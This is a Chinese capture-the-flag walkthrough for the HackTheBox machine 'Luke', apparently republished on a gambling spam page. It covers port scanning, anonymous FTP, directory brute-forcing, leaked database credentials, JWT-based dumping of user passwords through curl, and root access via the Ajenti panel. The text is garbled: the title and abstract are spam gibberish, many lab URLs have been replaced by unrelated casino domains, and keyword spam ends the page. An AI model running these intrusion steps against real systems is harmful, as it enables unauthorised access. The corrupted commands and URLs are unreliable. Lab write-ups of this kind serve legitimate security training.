澳门q立方登入:教你如何把HackTheBox里面的Luke“干掉”

本文地址:http://phm.ib776.com/qq_25879801/article/details/111083770
文章摘要:澳门q立方登入,如果不是知道你是人类檐廊,按这了女人有我没你但是他 看着澹台洪烈沉声道就是仙帝也是必死无疑他们可能会躲起来偷袭。

与往常一样,第一步是对主机进行Nmap识别正在运行的服务:

Nmap scan report for 10.10.10.137
Host is up (0.042s latency).
Not shown: 65464 closed ports, 66 filtered ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3+ (ext.1)
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    2 0        0             512 Apr 14 12:35 webapp
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.13.75
|      Logged in as ftp
|      TYPE: ASCII
|      No session upload bandwidth limit
|      No session download bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3+ (ext.1) - secure, fast, stable
|_End of status
22/tcp   open  ssh?
80/tcp   open  http    Apache httpd 2.4.38 ((FreeBSD) PHP/7.3.3)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.38 (FreeBSD) PHP/7.3.3
|_http-title: Luke
3000/tcp open  http    Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
8000/tcp open  http    Ajenti http control panel
|_http-title: Ajenti
No exact OS matches for host (If you know what OS is running on it, see http://phm.ib776.com/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=8/13%OT=21%CT=1%CU=33830%PV=Y%DS=2%DC=T%G=Y%TM=5D52853
OS:5%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=10D%TI=Z%CI=Z%II=RI%TS=21)O
OS:PS(O1=M54DNW6ST11%O2=M54DNW6ST11%O3=M54DNW6NNT11%O4=M54DNW6ST11%O5=M54DN
OS:W6ST11%O6=M54DST11)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFFF)E
OS:CN(R=Y%DF=Y%T=40%W=FFFF%O=M54DNW6SLL%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F
OS:=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=FFFF%S=O%A=S+%F=AS%O=M54DNW6ST11%R
OS:D=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%
OS:S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(
OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0
OS:%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=S%T=40%CD=S)

Network Distance: 2 hops

TRACEROUTE (using port 587/tcp)
HOP RTT      ADDRESS
1   40.68 ms 10.10.12.1
2   40.94 ms 10.10.10.137

OS and Service detection performed. Please report any incorrect results at http://phm.ib776.com/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 4814.02 seconds

从该输出中我们可以看到有很多开放的端口。我看到的第一个是FTP,因为它允许匿名登录。

root@kali:~/Documents/luke# ncftp 10.10.10.137
NcFTP 3.2.5 (Feb 02, 2011) by Mike Gleason (http://www.upp.8449933.com/contact/).
Connecting to 10.10.10.137...                                                                                                                                                                 
vsFTPd 3.0.3+ (ext.1) ready...
Logging in...                                                                                                                                                                                 
Login successful.
Logged in to 10.10.10.137.                                                                                                                                                                    
ncftp / > ls
webapp/
ncftp / > cd webapp/
Directory successfully changed.
ncftp /webapp > ls
for_Chihiro.txt
ncftp /webapp > cat for_Chihiro.txt 
Dear Chihiro !!

As you told me that you wanted to learn Web Development and Frontend, I can give you a little push by showing the sources of 
the actual website I've created .
Normally you should know where to look but hurry up because I will delete them soon because of our security policies ! 

Derry  

ncftp /webapp >

如您所见,通过FTP托管了一个文件。这是给千寻人的txt文件。这似乎是FTP上所有可用的东西。接下来,我决定移至端口80。浏览至10.10.10.137以查看托管的内容。

向我介绍了基本的Bootstrap 4页。源代码中没有隐藏任何内容,页面外也没有链接。然后,我运行dirb来查找服务器上托管的其他目录和文件。

root@kali:~/Documents/luke# dirb http://www.qfo.cao871.com

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Tue Aug 13 08:45:35 2019
URL_BASE: http://phm.ib776.com/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://phm.ib776.com/ ----
==> DIRECTORY: http://www.wle.733ib.com/css/                                                                          
+ http://www.ib776.com/293/index.html (CODE:200|SIZE:3138)                                                            
==> DIRECTORY: http://www.vyq.978ib.com/js/                                                                           
+ http://www.ib776.com/50/LICENSE (CODE:200|SIZE:1093)                                                               
+ http://www.vhc.cao656.com/management (CODE:401|SIZE:381)                                                             
==> DIRECTORY: http://phm.ib776.com/member/                                                                       
==> DIRECTORY: http://www.vtl.ib166.com/vendor/                                                                       
                                                                                                                 
---- Entering directory: http://www.hrc.ib765.com/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                 
---- Entering directory: http://www.lmx.8225544.com/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                 
---- Entering directory: http://www.ohd.sx811.com/member/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                 
---- Entering directory: http://www.vqb.cao928.com/vendor/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Tue Aug 13 09:02:59 2019
DOWNLOADED: 4612 - FOUND: 3

发现了目录的集合。我还使用dirbuster重新扫描并找到了/login.php和config.php。由于某种原因而被dirb抢走了。

当我浏览到config.php时,将返回以下内容:

$dbHost = 'localhost'; $dbUsername = 'root'; $dbPassword = 'Zk6heYCyv6ZE9Xcg'; $db = "login"; $conn = new mysqli($dbHost, $dbUsername, $dbPassword,$db) or die("Connect failed: %s\n". $conn -> error);

现在,我们有了一个用户名和密码的根:Zk6heYCyv6ZE9Xcg。/管理是发现的其他重要外观之一。当您浏览至此时,将显示HTTP基本身份验证字段。目前在端口80上似乎没有其他任何东西。因此,我随后移至端口3000。

当您尝试连接到它时,您会收到JSON响应:大约3000似乎是托管NodeJS应用的主机。

{"success":false,"message":"Auth token is not supplied"}

我在端口3000上运行dirb尝试查找其他内容。

DirBuster 1.0-RC1 - Report
http://www.cxq.718ib.com/index.php/Category:OWASP_DirBuster_Project
Report produced on Tue Aug 13 11:36:44 BST 2019
--------------------------------

http://www.ib776.com/137:3000
--------------------------------
Directories found during testing:

Dirs found with a 200 response:

/login/
/users/
/
/Login/
/users/admin/
/Users/
/Users/admin/
/users/Admin/
/Users/Admin/
/LogIn/
/LOGIN/


--------------------------------
--------------------------------

所有这些目录返回的JSON响应与原始目录非常相似,表明您需要进行身份验证。通过一番调查,我发现该应用程序正在使用JSON Web令牌。通过向身份验证服务器发送包含正确的用户名和密码的请求。服务器将使用令牌进行响应,然后可以使用令牌对应用程序进行身份验证。经过大量的试验和错误后,我可以使用以下串行生成令牌请求:

root@kali:/# curl -s -X POST -H 'Accept: application/json' -H 'Content-Type: application/json' --data '{"username":"admin","password":"Zk6heYCyv6ZE9Xcg","rememberMe":false}' http://www.ib776.com/599:3000/login
{"success":true,"message":"Authentication successful!","token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY1Nzc5NTg4LCJleHAiOjE1NjU4NjU5ODh9.pwVbukEZa90WsYzVOovh6GUer7wbHG1mNti9E9ajDJM"}root@kali:/#

如您所见,我使用CURL将POST请求发送到http://phm.ib776.com/392:3000/login。POST请求中包含在端口80上找到的用户名和密码。服务器以令牌密码响应。然后,我使用curl将令牌转发给应用程序。

root@kali:/# curl -H 'Accept: application/json' -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY1Nzc5NTg4LCJleHAiOjE1NjU4NjU5ODh9.pwVbukEZa90WsYzVOovh6GUer7wbHG1mNti9E9ajDJM" http://www.tzz.sg223.com:3000
{"message":"Welcome admin ! "}
root@kali:/#

发送后,服务器将显示消息“欢迎管理员!”。然后,我将同一令牌发送到与dirb找到的端口3000上的其他目录。

root@kali:/# curl -H 'Accept: application/json' -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY1Nzc5NTg4LCJleHAiOjE1NjU4NjU5ODh9.pwVbukEZa90WsYzVOovh6GUer7wbHG1mNti9E9ajDJM" http://phm.ib776.com:3000/users
[{"ID":"1","name":"Admin","Role":"Superuser"},{"ID":"2","name":"Derry","Role":"Web Admin"},{"ID":"3","name":"Yuri","Role":"Beta Tester"},{"ID":"4","name":"Dory","Role":"Supporter"}]
root@kali:/# 
root@kali:/# curl -H 'Accept: application/json' -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY1Nzc5NTg4LCJleHAiOjE1NjU4NjU5ODh9.pwVbukEZa90WsYzVOovh6GUer7wbHG1mNti9E9ajDJM" http://www.xdt.8994411.com:3000/users/admin
{"name":"Admin","password":"WX5b7)>/rp$U)FW"}

您可以看到/ users目录响应了一个用户名。管理员,德里,尤里和多莉。/users / admin目录以Admin的用户名和密码作为响应。管理员:WX5b7)> / rp $ U) FW。然后,我将令牌发送给/ users中的3个用户。

root@kali:~/Documents/luke# curl -H 'Accept: application/json' -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY1Nzc5NTg4LCJleHAiOjE1NjU4NjU5ODh9.pwVbukEZa90WsYzVOovh6GUer7wbHG1mNti9E9ajDJM" http://phm.ib776.com:3000/users/derry
{"name":"Derry","password":"rZ86wwLvx7jUxtch"}
root@kali:~/Documents/luke# curl -H 'Accept: application/json' -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY1Nzc5NTg4LCJleHAiOjE1NjU4NjU5ODh9.pwVbukEZa90WsYzVOovh6GUer7wbHG1mNti9E9ajDJM" http://phm.ib776.com:3000/users/yuri
{"name":"Yuri","password":"bet@tester87"}
root@kali:~/Documents/luke# curl -H 'Accept: application/json' -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY1Nzc5NTg4LCJleHAiOjE1NjU4NjU5ODh9.pwVbukEZa90WsYzVOovh6GUer7wbHG1mNti9E9ajDJM" http://www.zor.su133.com:3000/users/dory
{"name":"Dory","password":"5y:!xa=ybfe)/QD"}

所以毕竟,我有5套凭证

  • Dory:5y:!xa = ybfe)/ QD
  • Yuri:bet @ tester87
  • Derry:rZ86wwLvx7jUxtch
  • Admin:WX5b7)> / rp $ U)FW
  • root:Zk6heYCyv6ZE9Xcg

我回到端口80上的/管理,依次尝试了每个时间表。Derry用户能够登录。从这里,我们有一个目录,列出了3个不同的文件。Config.json,config.php和login.php 。我打开config.json并显示以下内容:

您可以从此JSON输出中看到,我们现在有了另一个root用户密码。然后,我继续探索8000端口。

这是用于管理服务器的软件。我尝试使用前面的步骤中捕获的6组替换登录。来自config.json的root登录名允许我登录到该页面。

然后在计算机上生成Web浏览器终端会话。有了该终端的访问权限,我便可以将user.txt和root.txt都保存起来以完成计算机。

# cd /root                                                                                                                                                      # ls                                                                                                                                                            .cache                 .cshrc                  .k5login                .mysql_history          .npm                    .wget-hsts                               .config                        .history                .login                  .node_repl_history      .profile                root.txt                         # cat root.txt                                                                                                                                                  [REDACTED]                                                                                                                                # cd /home/                                                                                                                                                     /home/derry                                                                                                                                                     # cd /home/derry                                                                                                                                                /home/derry                                                                                                                                                     # cd /home/derry                                                                                                                                                # ls                                                                                                                                                            .cshrc         .login          .login_conf     .mail_aliases   .mailrc         .profile        .shrc           user.txt                                         # cat user.txt                                                                                                                                                  [REDACTED]                                                                                                                                #

关注:Hunter网络安全 获取更多资讯
网站:bbs.kylzrv.com
CTF团队:Hunter网络安全
文章:Xtrato
排版:Hunter-匿名者

已标记关键词 清除标记
菲律宾申博馆 上申博网登入 菲律宾申博网址多少游戏网上娱乐场 太阳城188现金网登入2007 sbc49.com 澳门皇冠赌场筹码
新东方娱乐城 澳门威尼斯人附近哪些地方好玩的 申博太阳城网址不了游戏登入 金沙赌船六肖登入 博彩有效流水登入
太阳城太阳游戏 顶级娱乐dk755登入 澳门 威尼斯人 韩流网上娱乐场 国际赌博娱乐登入 自己给自己洗码登入
申博138体育登入 太阳城亚洲娱乐城网上娱乐场 新葡京直营登入 缅甸百盛登入 皇冠现金官网